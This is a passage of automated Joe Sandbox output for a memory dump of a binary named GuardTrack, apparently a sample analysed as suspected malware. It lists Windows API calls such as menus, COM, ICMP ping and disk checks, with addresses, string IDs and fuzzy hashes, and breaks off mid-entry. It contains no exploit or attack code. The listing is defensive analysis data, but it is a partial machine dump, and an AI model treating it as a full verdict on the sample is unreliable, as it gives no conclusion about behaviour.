                                                          • API String ID: 421087845-2263619337
                                                          • Opcode ID: f0b5819058f25ce59e39ffed84c94402899d240397b4187b9cd19d6d8ecc95f8
                                                          • Instruction ID: 11e9151f21c33def6ff314f9de5a5de43d63112db0d0fa3dbec765891671b834
                                                          • Opcode Fuzzy Hash: f0b5819058f25ce59e39ffed84c94402899d240397b4187b9cd19d6d8ecc95f8
                                                          • Instruction Fuzzy Hash: 9041B57150420AAFDB34DF68D846E7A7BF9FB45300F20486FE189D7292EA71A941CB21
                                                          APIs
                                                          • _memset.LIBCMT ref: 0063778F
                                                          • CreateMenu.USER32 ref: 006377AA
                                                          • SetMenu.USER32(?,00000000), ref: 006377B9
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00637846
                                                          • IsMenu.USER32(?), ref: 0063785C
                                                          • CreatePopupMenu.USER32 ref: 00637866
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00637893
                                                          • DrawMenuBar.USER32 ref: 0063789B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                          • String ID: 0$F
                                                          • API String ID: 176399719-3044882817
                                                          • Opcode ID: b4def6825aabcc13db38fe41dc607d53a3ed1fdff8289825183dd61a40ecb280
                                                          • Instruction ID: 298b060dc426f07121a11c062649bf27a6b391a2c589d0d8f9aab0f18f497ee9
                                                          • Opcode Fuzzy Hash: b4def6825aabcc13db38fe41dc607d53a3ed1fdff8289825183dd61a40ecb280
                                                          • Instruction Fuzzy Hash: DD415CB8A00209EFDB24DF64D988ADA7BF6FF49310F144029FA45A7360D730A910CF90
                                                          APIs
                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00637B83
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00637B8A
                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00637B9D
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00637BA5
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00637BB0
                                                          • DeleteDC.GDI32(00000000), ref: 00637BB9
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00637BC3
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00637BD7
                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00637BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                          • String ID: static
                                                          • API String ID: 2559357485-2160076837
                                                          • Opcode ID: 41e2c939f353a58d67a7aa25a356d4a77df6e542482493d0930dddfbeb750269
                                                          • Instruction ID: 53e49f064df3964adf73a384d63b352965fcc7de3a5ff4a125b1c3ae5cb33e51
                                                          • Opcode Fuzzy Hash: 41e2c939f353a58d67a7aa25a356d4a77df6e542482493d0930dddfbeb750269
                                                          • Instruction Fuzzy Hash: 7D318175104119ABEF215F64DC49FDB7B6AFF0A720F111214FA56A61A0C731D820DBA4
                                                          APIs
                                                          • _memset.LIBCMT ref: 005D706B
                                                            • Part of subcall function 005D8D58: __getptd_noexit.LIBCMT ref: 005D8D58
                                                          • __gmtime64_s.LIBCMT ref: 005D7104
                                                          • __gmtime64_s.LIBCMT ref: 005D713A
                                                          • __gmtime64_s.LIBCMT ref: 005D7157
                                                          • __allrem.LIBCMT ref: 005D71AD
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005D71C9
                                                          • __allrem.LIBCMT ref: 005D71E0
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005D71FE
                                                          • __allrem.LIBCMT ref: 005D7215
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005D7233
                                                          • __invoke_watson.LIBCMT ref: 005D72A4
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                          • String ID:
                                                          • API String ID: 384356119-0
                                                          • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                          • Instruction ID: 7d5d17cb3abd6cf31abc13eba119cac00c435afdf704f928790bd15005db497e
                                                          • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                          • Instruction Fuzzy Hash: 2D71D671A0475BABD7249A7DCC8AB6ABBA9BF58320F14422BF514D73C1F770D9408B90
                                                          APIs
                                                          • _memset.LIBCMT ref: 00612CE9
                                                          • GetMenuItemInfoW.USER32(00677890,000000FF,00000000,00000030), ref: 00612D4A
                                                          • SetMenuItemInfoW.USER32(00677890,00000004,00000000,00000030), ref: 00612D80
                                                          • Sleep.KERNEL32(000001F4), ref: 00612D92
                                                          • GetMenuItemCount.USER32(?), ref: 00612DD6
                                                          • GetMenuItemID.USER32(?,00000000), ref: 00612DF2
                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00612E1C
                                                          • GetMenuItemID.USER32(?,?), ref: 00612E61
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00612EA7
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00612EBB
                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00612EDC
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                          • String ID:
                                                          • API String ID: 4176008265-0
                                                          • Opcode ID: dd360feea8debbe926bdb3d32d1e8fd60e82c973e0ac50e37c286ece036dcca9
                                                          • Instruction ID: 2e7904fe10ff9d239f49477910a2a63321ab9f7268f0bf275eb060de3dd9cf8c
                                                          • Opcode Fuzzy Hash: dd360feea8debbe926bdb3d32d1e8fd60e82c973e0ac50e37c286ece036dcca9
                                                          • Instruction Fuzzy Hash: 9861B07090024AAFDB14DF64DD98AFE7BBAEF41304F184059F851A7351D731AEA5CB21
                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006375CA
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006375CD
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 006375F1
                                                          • _memset.LIBCMT ref: 00637602
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00637614
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0063768C
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow_memset
                                                          • String ID:
                                                          • API String ID: 830647256-0
                                                          • Opcode ID: c1b8ef8851b5b8548a35f6cfd7f7a357135f97566f4bbba428ccc8a0ee5a874a
                                                          • Instruction ID: c98daf41b3678d5821ec11b48b1ee82d18700572b494b84217376a030180a07c
                                                          • Opcode Fuzzy Hash: c1b8ef8851b5b8548a35f6cfd7f7a357135f97566f4bbba428ccc8a0ee5a874a
                                                          • Instruction Fuzzy Hash: 5D618BB5900208AFDB20DFA4CC85EEE77F9EB09710F144199FA14A73A1C770AE41DBA0
                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006077DD
                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00607836
                                                          • VariantInit.OLEAUT32(?), ref: 00607848
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00607868
                                                          • VariantCopy.OLEAUT32(?,?), ref: 006078BB
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 006078CF
                                                          • VariantClear.OLEAUT32(?), ref: 006078E4
                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 006078F1
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006078FA
                                                          • VariantClear.OLEAUT32(?), ref: 0060790C
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00607917
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          • Opcode ID: f0fa5227f1d2dc366584f4d30f2c4f2b277f0888d40a057a89ad649f38c3aaa8
                                                          • Instruction ID: 7c02eaaafa92cbda8f38a30837bf6031565f5b844792a013bfe5d7b3f53c6f70
                                                          • Opcode Fuzzy Hash: f0fa5227f1d2dc366584f4d30f2c4f2b277f0888d40a057a89ad649f38c3aaa8
                                                          • Instruction Fuzzy Hash: B4415335E00119DFDB04DFA4D8489EEBBFAFF48354F008469EA55A7261D730AA45CFA0
                                                          APIs
                                                            • Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
                                                            • Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC
                                                          • CoInitialize.OLE32 ref: 00628AED
                                                          • CoUninitialize.OLE32 ref: 00628AF8
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00643BBC,?), ref: 00628B58
                                                          • IIDFromString.OLE32(?,?), ref: 00628BCB
                                                          • VariantInit.OLEAUT32(?), ref: 00628C65
                                                          • VariantClear.OLEAUT32(?), ref: 00628CC6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 834269672-1287834457
                                                          • Opcode ID: b1a14c605aa94ff689fa70afb3ebf7ddc84378c5f56c6fd6df33e1a41f4b6a93
                                                          • Instruction ID: 7428ea4b6b36f25f0ba62c4de4eb072bd6ca0e86ffb18a2bde01bee59d2e40bb
                                                          • Opcode Fuzzy Hash: b1a14c605aa94ff689fa70afb3ebf7ddc84378c5f56c6fd6df33e1a41f4b6a93
                                                          • Instruction Fuzzy Hash: A8619F70205B219FD710DF14D889BAABBE6BF85715F00084DF9859B291CB70ED45CFA6
                                                          APIs
                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00625E7E
                                                          • inet_addr.WSOCK32(?,?,?), ref: 00625EC3
                                                          • gethostbyname.WSOCK32(?), ref: 00625ECF
                                                          • IcmpCreateFile.IPHLPAPI ref: 00625EDD
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00625F4D
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00625F63
                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00625FD8
                                                          • WSACleanup.WSOCK32 ref: 00625FDE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                          • String ID: Ping
                                                          • API String ID: 1028309954-2246546115
                                                          • Opcode ID: 2db8bca257199a682a7edfc6924fc109092942942b7954f56568ccc755c8964b
                                                          • Instruction ID: e3bcc4ba24260963e6be992781854e67436dc98c254b2e3569c5ef8f13fa5353
                                                          • Opcode Fuzzy Hash: 2db8bca257199a682a7edfc6924fc109092942942b7954f56568ccc755c8964b
                                                          • Instruction Fuzzy Hash: 56519031604A119FD720EF24DD49F6ABBE6EF88710F144929F996DB2A1DB70E900CF42
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0061BB13
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0061BB89
                                                          • GetLastError.KERNEL32 ref: 0061BB93
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0061BC00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: 1646531061d95d957a4da1dbda0ba2a291f21b3c94d2c861e0d473be89aaaac5
                                                          • Instruction ID: 8ad18d5a7eb25550ca8847250f4b57644996cdfdce9fc39c7896eb58407c88af
                                                          • Opcode Fuzzy Hash: 1646531061d95d957a4da1dbda0ba2a291f21b3c94d2c861e0d473be89aaaac5
                                                          • Instruction Fuzzy Hash: 2531B235A04209AFCB10DF64C849EEEBBB6FF45310F189169E905D7796DF70A982CB90
                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03), ref: 0061357C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: ,zg0zg$,zg0zg$blank$info$question$stop$warning
                                                          • API String ID: 2457776203-1536444093
                                                          • Opcode ID: b888f12b0927f0b721e2e3a5413a80a18ee122440bbef4f3296dfa9c4cc85157
                                                          • Instruction ID: d43bc040573a8b7c7e74abc5408230b96ae158caf37ace9f4a438a7ef9b486f3
                                                          • Opcode Fuzzy Hash: b888f12b0927f0b721e2e3a5413a80a18ee122440bbef4f3296dfa9c4cc85157
                                                          • Instruction Fuzzy Hash: 28112775609367FEA7105A54DC82CEA779FDF06B60B24002BFA01A6381E7746FC046A1
                                                          APIs
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                            • Part of subcall function 0060B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0060B7BD
                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00609BCC
                                                          • GetDlgCtrlID.USER32 ref: 00609BD7
                                                          • GetParent.USER32 ref: 00609BF3
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00609BF6
                                                          • GetDlgCtrlID.USER32(?), ref: 00609BFF
                                                          • GetParent.USER32(?), ref: 00609C1B
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00609C1E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: 506c81cfba27349eefeef46b7a80407971189273fb6fba63ee23f653f8bfd235
                                                          • Instruction ID: f8281ba81bc7a8fe742f8d79f72d5640f35123515281829ead7ffb020ac73551
                                                          • Opcode Fuzzy Hash: 506c81cfba27349eefeef46b7a80407971189273fb6fba63ee23f653f8bfd235
                                                          • Instruction Fuzzy Hash: 3C21C175941104AFDF08EBA0CC89EFEBBB6EF96310F101119F962932E2DB7598159B20
                                                          APIs
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                            • Part of subcall function 0060B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0060B7BD
                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00609CB5
                                                          • GetDlgCtrlID.USER32 ref: 00609CC0
                                                          • GetParent.USER32 ref: 00609CDC
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00609CDF
                                                          • GetDlgCtrlID.USER32(?), ref: 00609CE8
                                                          • GetParent.USER32(?), ref: 00609D04
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00609D07
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: b1abcc7a953b3f1fb5acd713cd7b765c120ef1d2a958085589a48e496d2f546a
                                                          • Instruction ID: 5338584f13971ee5418eddf2a737375a9781a160dd6c67bc5fb8faa3a445e96f
                                                          • Opcode Fuzzy Hash: b1abcc7a953b3f1fb5acd713cd7b765c120ef1d2a958085589a48e496d2f546a
                                                          • Instruction Fuzzy Hash: 5F21A175981104BFDF04ABA0CC85EFEBBBAEF96300F104115F952972E2DB7599159B20
                                                          APIs
                                                          • GetParent.USER32 ref: 00609D27
                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00609D3C
                                                          • _wcscmp.LIBCMT ref: 00609D4E
                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00609DC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                          • API String ID: 1704125052-3381328864
                                                          • Opcode ID: c462eb87d0974db77cad765a306884a5a52a49b8b130540c9066983f9e13c22e
                                                          • Instruction ID: 85506a14d394c6879967822791d36ae054ea387a0c2a5997ec810b2bf1ab19d0
                                                          • Opcode Fuzzy Hash: c462eb87d0974db77cad765a306884a5a52a49b8b130540c9066983f9e13c22e
                                                          • Instruction Fuzzy Hash: 671136BA2C9713BAF7182664EC0BDE7779FEF01320B200017FA01A01D2FA656A114972
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00628FC1
                                                          • CoInitialize.OLE32(00000000), ref: 00628FEE
                                                          • CoUninitialize.OLE32 ref: 00628FF8
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 006290F8
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00629225
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00643BDC), ref: 00629259
                                                          • CoGetObject.OLE32(?,00000000,00643BDC,?), ref: 0062927C
                                                          • SetErrorMode.KERNEL32(00000000), ref: 0062928F
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0062930F
                                                          • VariantClear.OLEAUT32(?), ref: 0062931F
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                          • String ID:
                                                          • API String ID: 2395222682-0
                                                          • Opcode ID: ad7d9a213df6af9a6bb2bfc1a00cfe3be471f49ea612c231286a307c0802fe9a
                                                          • Instruction ID: 352289eed2d0a8ca17d54f774fe45b93990bbd959899be47c7ac968c213f2e9a
                                                          • Opcode Fuzzy Hash: ad7d9a213df6af9a6bb2bfc1a00cfe3be471f49ea612c231286a307c0802fe9a
                                                          • Instruction Fuzzy Hash: 74C12471208715AFD700DF64D88896BB7EAFF89308F00491DF98A9B251DB71ED06CB62
                                                          APIs
                                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00618027
                                                          Memory Dump Source
